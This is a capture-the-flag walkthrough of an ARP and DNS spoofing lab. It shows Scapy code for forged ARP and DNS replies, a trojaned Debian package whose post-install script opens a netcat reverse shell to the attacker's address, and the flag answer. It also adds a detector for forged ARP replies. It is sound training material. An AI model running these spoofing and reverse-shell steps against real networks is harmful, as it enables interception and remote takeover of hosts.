
Objective #9 - ARP Shenanigans

Objective

Go to the NetWars room on the roof and help Alabaster Snowball get access back to a host using ARP. Retrieve the document at /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt. Who recused herself from the vote described on the document?

Tip

If you need help, read the HELP.md file in the terminal for additional hints.

Solution

Step 1: Capture some packets and notice that there are unanswered ARP requests coming from the remote host.

$ tshark  -ni eth0
Capturing on 'eth0'
    1 0.000000000 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.35

Step 2: Modify arp_resp.py to create a spoofed reply to the ARP request. The following lines need to be modified in the script.

# Ethernet header: from our eth0 MAC to the MAC of the host that sent the request
ether_resp = Ether(dst="4c:24:57:ab:ed:84", type=0x806, src="02:42:0a:06:00:02")

# ARP reply (op=2) claiming that 10.6.6.53 lives at our MAC
arp_response = ARP(pdst="10.6.6.35")
arp_response.op = 2
arp_response.plen = 4
arp_response.hwlen = 6
arp_response.ptype = 0x0800
arp_response.hwtype = 1

arp_response.hwsrc = "02:42:0a:06:00:02"   # our MAC, offered as the answer
arp_response.psrc = "10.6.6.53"            # the address the requester asked about
arp_response.hwdst = "4c:24:57:ab:ed:84"   # requester's MAC
arp_response.pdst = "10.6.6.35"            # requester's IP

Note

Your terminal may use slightly different values for IP address and MAC address. Be sure to check the output of ifconfig to see what values to use for the local host.

Step 3: Observe the DNS request once the ARP reply is correct.

$ tshark  -ni eth0
Capturing on 'eth0'
   9 8.295979549 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.35
   10 8.320179378 02:42:0a:06:00:03 → 4c:24:57:ab:ed:84 ARP 42 10.6.6.53 is at 02:42:0a:06:00:03
   11 8.336321657    10.6.6.35 → 10.6.6.53    DNS 74 Standard query 0x0000 A ftp.osuosl.org
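As an added detection-side example (not part of the original writeup or the challenge scripts), the following Python reads tshark ARP lines like the capture above and flags replies that look forged. It assumes a Docker-style bridge network like this one, where MACs are derived as 02:42 followed by the four IP octets, so a reply whose sender MAC encodes a different address than the one it claims is suspect; an optional trusted IP-to-MAC table (assumed input) adds the classic change-of-mapping check.

```python
import re

# Constructed from the two ARP lines in the tshark output above (request, then the forged reply).
SAMPLE_CAPTURE = """\
    9 8.295979549 4c:24:57:ab:ed:84 → ff:ff:ff:ff:ff:ff ARP 42 Who has 10.6.6.53? Tell 10.6.6.35
   10 8.320179378 02:42:0a:06:00:03 → 4c:24:57:ab:ed:84 ARP 42 10.6.6.53 is at 02:42:0a:06:00:03
"""

# One tshark ARP reply line: "<no> <time> <src mac> → <dst mac> ARP <len> <ip> is at <mac>"
ARP_REPLY = re.compile(
    r"^\s*\d+\s+[\d.]+\s+(?P<src>[0-9a-fA-F:]{17})\s+(?:→|->)\s+(?P<dst>[0-9a-fA-F:]{17})"
    r"\s+ARP\s+\d+\s+(?P<ip>\d+\.\d+\.\d+\.\d+) is at (?P<mac>[0-9a-fA-F:]{17})\s*$"
)


def embedded_ip(mac):
    """Docker's bridge driver builds MACs as 02:42 + the four IPv4 octets (assumed here);
    return that IPv4 address, or None when the MAC is not of that form."""
    octets = mac.lower().split(":")
    if len(octets) != 6 or octets[:2] != ["02", "42"]:
        return None
    return ".".join(str(int(o, 16)) for o in octets[2:])


def find_suspicious_replies(capture, known=None):
    """Scan tshark ARP lines; return (claimed_ip, mac, reason) for replies that look forged."""
    table = dict(known or {})  # trusted IP -> MAC mappings, e.g. taken from a DHCP lease file
    findings = []
    for line in capture.splitlines():
        m = ARP_REPLY.match(line)
        if not m:
            continue  # requests and non-ARP lines make no claim to check
        ip, mac = m["ip"], m["mac"].lower()
        if m["src"].lower() != mac:
            findings.append((ip, mac, "frame source MAC differs from the advertised MAC"))
        inner = embedded_ip(mac)
        if inner is not None and inner != ip:
            findings.append((ip, mac, f"MAC encodes {inner}, not the claimed {ip}"))
        if ip in table and table[ip].lower() != mac:
            findings.append((ip, mac, f"{ip} was known at {table[ip]}"))
        table.setdefault(ip, mac)  # first sighting becomes the baseline for later lines
    return findings


if __name__ == "__main__":
    for claimed, mac, why in find_suspicious_replies(SAMPLE_CAPTURE):
        print(f"suspicious ARP reply: {claimed} is at {mac}: {why}")
```

On the capture above the reply for 10.6.6.53 is flagged because its MAC 02:42:0a:06:00:03 encodes 10.6.0.3, the address of the answering host, not the one it claims.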

Step 4: Modify dns_resp.py to create a spoofed reply to the DNS request. The following lines need to be modified in the script. When you run this, you’ll see in the tshark output that a request is being made to port 80 on your host.

ipaddr_we_arp_spoofed = "10.6.6.53"   # the address we answered for in the ARP reply

def handle_dns_request(packet):
    # Reply from the spoofed DNS server's address back to the requester; ipaddr is this
    # host's own eth0 address (defined earlier in the script), so the name resolves to us.
    eth = Ether(src="02:42:0a:06:00:02", dst="4c:24:57:ab:ed:84")
    ip  = IP(dst="10.6.6.35", src="10.6.6.53")
    udp = UDP(dport=packet[UDP].sport, sport=53)
    dns = DNS(
        id=packet[DNS].id, qd=packet[DNS].qd, aa=1, qr=1,
        an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=ipaddr)
    )

Step 5: Set up an HTTP listener to answer the port 80 connection. You'll see that the client is requesting a .deb file.

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
10.6.6.35 - - [14/Dec/2020 03:14:41] code 404, message File not found
10.6.6.35 - - [14/Dec/2020 03:14:41] "GET /pub/jfrost/backdoor/suriv_amd64.deb HTTP/1.1" 404 -

Step 6: Create a deb file to exploit the remote host. A .deb file is a Debian software package. A post-installation script can be embedded in the file to run commands necessary to complete the package setup. You'll find a netcat deb package in the debs folder on the terminal. You can rename this to the deb package being requested by the remote host, and modify it to run a netcat command after it is installed.

fakeroot sh -c '
   mkdir tmp
   dpkg-deb -R debs/netcat-traditional_1.10-41.1ubuntu1_amd64.deb tmp
   echo "nc -e /bin/sh 10.6.0.2 5678" >> tmp/DEBIAN/postinst
   dpkg-deb -b tmp fixed.deb
'

Info

fakeroot runs a command in an environment where it appears to have root privileges for file manipulation. This is useful for allowing users to create archives (tar, ar, .deb etc.) with files in them with root permissions/ownership. (From https://wiki.debian.org/FakeRoot)

Step 7: Put it all together.

Tmux pane #1 contains the DNS spoof responder and the HTTP listener.

$ mkdir -p http/pub/jfrost/backdoor
$ mv fixed.deb http/pub/jfrost/backdoor/suriv_amd64.deb
$ scripts/dns_resp.py && python3 -m http.server 80 --directory http/

TMUX pane #3 contains the netcat listener to catch the reverse shell.

$ nc -nlvp 5678

Tmux pane #2 contains the ARP spoof responder.

$ scripts/arp_resp.py

Step 8: When the reverse shell is established, view the target file.

$ nc -nlvp 5678
listening on [any] 5678
connect to [10.6.0.2] from (UNKNOWN) [10.6.6.35] 35976
id
uid=1500(jfrost) gid=1500(jfrost) groups=1500(jfrost)
cat /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt
NORTH POLE
LAND USE BOARD
MEETING MINUTES

January 20, 2020

Meeting Location: All gathered in North Pole Municipal Building, 1 Santa Claus Ln, North Pole

Chairman Frost calls meeting to order at 7:30 PM North Pole Standard Time.

Roll call of Board members please:
Chairman Jack Frost - Present
Vice Chairman Mother Nature - Present

Superman - Present
Clarice - Present
Yukon Cornelius - HERE!
Ginger Breaddie - Present
King Moonracer - Present
Mrs. Donner - Present
Tanta Kringle - Present
Charlie In-the-Box - Here
Krampus - Growl
Dolly - Present
Snow Miser - Heya!
Alabaster Snowball - Hello
Queen of the Winter Spirits - Present

ALSO PRESENT:
                Kris Kringle
                Pepper Minstix
                Heat Miser
                Father Time

Chairman Frost made the required announcement concerning the Open Public Meetings Act: 
Adequate notice of this meeting has been made -- displayed on the bulletin board next to the 
Pole, listed on the North Pole community website, and published in the North Pole Times 
newspaper -- for people who are interested in this meeting.

Review minutes for December 2020 meeting. Motion to accept – Mrs. Donner. Second – Superman.  
Minutes approved.

OLD BUSINESS: No Old Business.

RESOLUTIONS:
The board took up final discussions of the plans presented last year for the expansion of 
Santa’s Castle to include new courtyard, additional floors, elevator, roughly tripling the 
size of the current castle.  Architect Ms. Pepper reviewed the planned changes and 
engineering reports. Chairman Frost noted, “These changes will put a heavy toll on the 
infrastructure of the North Pole.”  Mr. Krampus replied, “The infrastructure has already been 
expanded to handle it quite easily.”  Chairman Frost then noted, “But the additional traffic 
will be a burden on local residents.”  Dolly explained traffic projections were all in 
alignment with existing roadways.  Chairman Frost then exclaimed, “But with all the attention 
focused on Santa and his castle, how will people ever come to refer to the North Pole as ‘The 
Frostiest Place on Earth?’”  Mr. In-the-Box pointed out that new tourist-friendly taglines 
are always under consideration by the North Pole Chamber of Commerce, and are not a matter 
for this Board.  Mrs. Nature made a motion to approve.  Seconded by Mr. Cornelius.  Tanta 
Kringle recused herself from the vote given her adoption of Kris Kringle as a son early in 
his life.  

Approved:
Mother Nature
Superman
Clarice
Yukon Cornelius
Ginger Breaddie
King Moonracer
Mrs. Donner
Charlie In the Box
Krampus
Dolly
Snow Miser
Alabaster Snowball
Queen of the Winter Spirits

Opposed: 
                Jack Frost

Resolution carries.  Construction approved.

NEW BUSINESS:

Father Time Castle, new oversized furnace to be installed by Heat Miser Furnace, Inc.  Mr. H. 
Miser described the plan for installing new furnace to replace the faltering one in Mr. 
Time’s 20,000 sq ft castle. Ms. G. Breaddie pointed out that the proposed new furnace is 
900,000,000 BTUs, a figure she considers “incredibly high for a building that size, likely 
two orders of magnitude too high.  Why, it might burn the whole North Pole down!”  Mr. H. 
Miser replied with a laugh, “That’s the whole point!”  The board voted unanimously to reject 
the initial proposal, recommending that Mr. Miser devise a more realistic and safe plan for 
Mr. Time’s castle heating system.


Motion to adjourn – So moved, Krampus.  Second – Clarice. All in favor – aye. None opposed, 
although Chairman Frost made another note of his strong disagreement with the approval of the 
Kringle Castle expansion plan.  Meeting adjourned.

Answer: Tanta Kringle